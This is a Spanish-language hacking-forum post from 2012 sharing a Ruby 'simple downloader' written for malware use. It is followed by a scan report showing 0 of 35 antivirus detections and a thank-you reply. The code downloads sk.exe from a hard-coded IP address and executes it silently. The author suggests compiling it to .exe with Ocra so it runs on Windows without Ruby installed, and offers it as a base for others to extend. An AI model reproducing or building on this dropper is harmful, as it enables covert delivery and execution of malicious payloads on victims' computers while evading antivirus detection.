Ruby simple Downloader - Sanko

en: Septiembre 12, 2012, 08:30:16 pm

Bueno aqui estuve haciendo un simple downloader para ruby , lo hice como prueba para saber como actuaría en un entorno "de malware" , es muy básico pero tampoco lo voy a dar todo masticado , esta es una base a la cual podeís añadir cosillas para que sea una gran tool.

Código :

Código: Ruby

require 'Win32API'
require 'open-uri'
 
=begin
----------------------------------
| Coded by Sanko              |
| Simple Ruby Downloader |
----------------------------------
=end
 
archivo = 'sk.exe' #Nombre del archivo a descargar
url = 'http://199.91.152.95/cz989jnk55qg/67fcyfx9xsf31mz/sk.exe' #Url directa del archivo a descargar
 
archivo = open(archivo,"wb") #se abre se escribe se lee y se cierra , lo que viene siendo una descarga...
archivo.write(open(url).read)
archivo.close
 
aplicacion = Thread.start do #Hacemos que system ejecute el archivo descargado
   system 'sk.exe'
end

Para poder ejecutarlo en un entorno windows sin necesidad de que este disponga de un "emulador" para el lenguaje podeís convertir vuestro script.rb en una aplicación .exe , aqui os dejo el tutorial que hace un rato hice :

http://underc0de.org/foro/ruby/script-rb-a-script-exe-con-ocra/msg39772/#new

Lo peor de todo es que al pasarlo a .exe con ocra el tamaño de este pequeño código como cualquier otro aumenta considerablemente.
Aun asi puede decirse que no hay mucha gente que use ruby en un entorno hacia el malware , pero tiene futuro :

[Info]
Fecha del reporte: Wed, 12 Sep 2012 22:49:23 +0000
Archivo: downloader.exe
Tamaño: 5099284 bytes
MD5: 49e985612dcf90085bb9a61093abddc8
Estado: Limpio
Detecciones: 0 de 35 (0%)
Reporte: http://www.indetectables.net/scanner.php?report=2e48e3_29bbpc65
Reporte generado por Indetectables.net

[Detecciones]
A-Squared - Clean
AVG Free - Clean
Ad-Aware - Clean
AntiVir (Avira) - Clean
ArcaVir - Clean
Avast 5 - Clean
BitDefender - Clean
BullGuard - Clean
COMODO Internet Security - Clean
Clam Antivirus - Clean
Dr.Web - Clean
ESET NOD32 - Clean
F-PROT Antivirus - Clean
F-Secure Internet Security - Clean
G Data - Clean
IKARUS Security - Clean
Immunet Antivirus - Clean
K7 Ultimate - Clean
Kaspersky Antivirus - Clean
MS Security Essentials - Clean
McAfee - Clean
Norman - Clean
Norton Antivirus - Clean
Panda Security - Clean
Quick Heal Antivirus - Clean
Rising Antivirus - Clean
Solo Antivirus - Clean
Sophos - Clean
Trend Micro Internet Security - Clean
VBA32 Antivirus - Clean
VIPRE - Clean
Vexira Antivirus - Clean
VirusBuster Internet Security - Clean
Zoner AntiVirus - Clean
eTrust-Vet - Clean

Gracias Elsuc por escanearme el archivo.

Y aqui una muestra de como se comporta :

en: Septiembre 21, 2012, 10:19:48 pm

muchas gracias por compartir el codigo Sanko.
Saludos.

[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal Iniciado por ANTRAX	Respuestas: 0 Vistas: 2855	Febrero 24, 2010, 04:16:38 pm por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco. Iniciado por Alejandro_99	Respuestas: 2 Vistas: 3162	Agosto 15, 2013, 02:58:39 pm por Alejandro_99
Crafting rails 4 applications (Manual de Ruby on Rails 4) Iniciado por Alejandro_99	Respuestas: 0 Vistas: 1998	Marzo 01, 2014, 05:34:50 pm por Alejandro_99
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails" Iniciado por Alejandro_99	Respuestas: 0 Vistas: 2476	Junio 13, 2014, 03:27:08 pm por Alejandro_99
Como Instalar RubyMine y Crear un proyecto vacio para Ruby y Rails Iniciado por Alejandro_99	Respuestas: 0 Vistas: 2901	Julio 07, 2013, 10:51:08 pm por Alejandro_99

Underc0de - Hacking y seguridad informática

Ruby simple Downloader - Sanko

Sanko

Ruby simple Downloader - Sanko

Aryenal.Bt

Re:Ruby simple Downloader - Sanko

Similar topics (5)